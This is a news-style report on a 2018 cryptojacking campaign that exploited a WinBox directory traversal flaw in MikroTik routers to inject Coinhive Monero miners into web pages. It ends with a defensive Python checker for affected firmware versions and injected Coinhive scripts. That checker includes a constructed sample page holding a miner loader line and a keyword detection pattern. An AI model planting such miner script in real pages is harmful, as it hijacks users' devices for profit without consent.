According to researchers, over 415,000 routers around the world have been targeted by malware that infects devices and then steals their computing resources for crypto mining. Reports indicate that the campaign is mostly targeting MikroTik routers and is believed to have started at some point in August 2018.
The campaign supposedly infected around 200,000 devices in the first string of attacks. However, it did not stop there, and that number has since doubled. Considering that MikroTik routers are among the most common ones around the world, it is possible that this number will continue to grow.
While the latest firmware update that protects devices from the attack is already out, it is apparent that a lot of users have yet to install it. Despite the large number of infected devices, it appears that the campaign is only actively targeting this single brand. If it were to include others, experts believe that the figures would be significantly higher.
Even without targeting other brands, the threat is expanding rapidly, although researchers noticed that the majority of infected devices are located in a single country: Brazil. However, this does not mean that the campaign is ignoring other vulnerable devices, as new ones are being detected around the globe all the time. So far, reports have found infected devices on each continent.
Attackers are after Monero
Researchers have also noted that the mining software used in the campaign is Coinhive, a miner dedicated to mining the privacy coin Monero. While this makes sense, as Monero is often the target of hackers who use cryptojacking to make a profit, researchers also found that the attackers employed other pieces of mining software as well.
As for the method of attack, researchers have uncovered that the attacker or attackers are exploiting a directory traversal vulnerability. This flaw was found in the WinBox interface of some older versions of routers created by MikroTik. These include versions up to 6.42.
The flaw was then used for injecting the Coinhive script on different web pages that users were visiting. Through this exploit, attackers were able to read arbitrary files even if unauthenticated. Meanwhile, authenticated remote attackers were even able to write arbitrary files.
Those who believe that they might be affected by the campaign should update their routers to the latest firmware. While this is good advice for every brand, it is especially important for those who use MikroTik routers, as these are the ones that are targeted in the attack.
As mentioned, MikroTik has already created and released a patch that will protect flawed devices from the attack. The patch can be found on MikroTik's official website.
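A defender-side check for the two conditions described above, as an added example that is not part of the original article or of MikroTik's tooling: it flags RouterOS version strings that fall in the affected range and lists the scripts in a fetched page that reference Coinhive. Reading "up to 6.42" as inclusive is an assumption, and the version strings, the miner.example host and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
# Assumption: the page's "up to 6.42" is read as inclusive of 6.42.
LAST_AFFECTED = (6, 42)

def needs_update(version_text):
    """True if the version is in the affected range or cannot be parsed."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", version_text.strip())
    if not m:
        return True  # fail closed: rc/beta or unknown strings get a manual check
    version = tuple(int(g) for g in m.groups() if g is not None)
    return version <= LAST_AFFECTED  # (6, 42, 1) compares greater than (6, 42)

class ScriptFinder(HTMLParser):
    """Collects the src attribute and inline body of every <script> element."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append(dict(attrs).get("src") or "")

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += " " + data

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

def coinhive_scripts(html):
    """Return the src/body of each script in the page that mentions Coinhive."""
    finder = ScriptFinder()
    finder.feed(html)
    finder.close()
    return [s.strip() for s in finder.scripts if "coinhive" in s.lower()]

# Constructed sample of a page as delivered to a client (not captured traffic).
SAMPLE_PAGE = """<html><head>
<script src="https://miner.example/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous("CONSTRUCTED-KEY"); m.start();</script>
<script src="/static/app.js"></script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    print(needs_update("6.42"), coinhive_scripts(SAMPLE_PAGE))
```

A page fetched through the router that lists a Coinhive script the origin site does not serve when fetched over a trusted connection points to injection in transit.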